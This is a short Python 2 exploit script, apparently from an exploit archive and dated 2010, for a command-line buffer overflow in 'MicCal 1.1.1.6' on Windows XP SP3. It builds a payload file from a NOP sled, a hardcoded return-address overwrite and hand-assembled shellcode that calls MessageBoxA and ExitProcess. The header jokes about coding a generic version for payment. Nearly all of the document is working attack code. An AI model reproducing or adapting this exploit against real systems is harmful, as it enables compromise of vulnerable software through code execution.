# done by BraniX <branix@hackers.org.pl># www.hackers.org.pl# found: 2010.08.24# tested on: Windows XP SP3 Home Edition# App. has classic buffer overflow vulnerability# it can be triggered by passing too long argument # as a startup parameter. Shellcode can by run via classic# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)# Ps. If you need generic exploit ...# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ # we will c0de it for You ^^
filepath = "C:\\ShellCode\\MicCal 1.1.1.6 - Exploit.bin"
f = open(filepath,"wb")# dummy data
f.write('\x90'* 340)# overwrite ret
f.write('\xD7\x30\x9D\x7C')
f.write("[BraniX]")
f.write('A'* 8)# start shellcode
f.write('\x83\xEC\x08')# sub esp,8
f.write('\x88\x04\x24')# mov byte ptr [esp], al
f.write('\x83\xEC\x08')# sub esp,8
f.write('\x54')# push esp
f.write('\x5B')# pop ebx
f.write('\x50')# push eax
f.write('\x53')# push ebx
f.write('\x53')# push ebx
f.write('\x50')# push eax
f.write('\xE8\x35\x08\x27\x7E')# call user32.MessageBoxA
f.write('\x57')# push edi
f.write('\xE8\x57\xCB\x6E\x7C')# call kernel32.ExitProcess
f.write('\xCC'* 10)# int 3's
f.close()
print "Done ..."
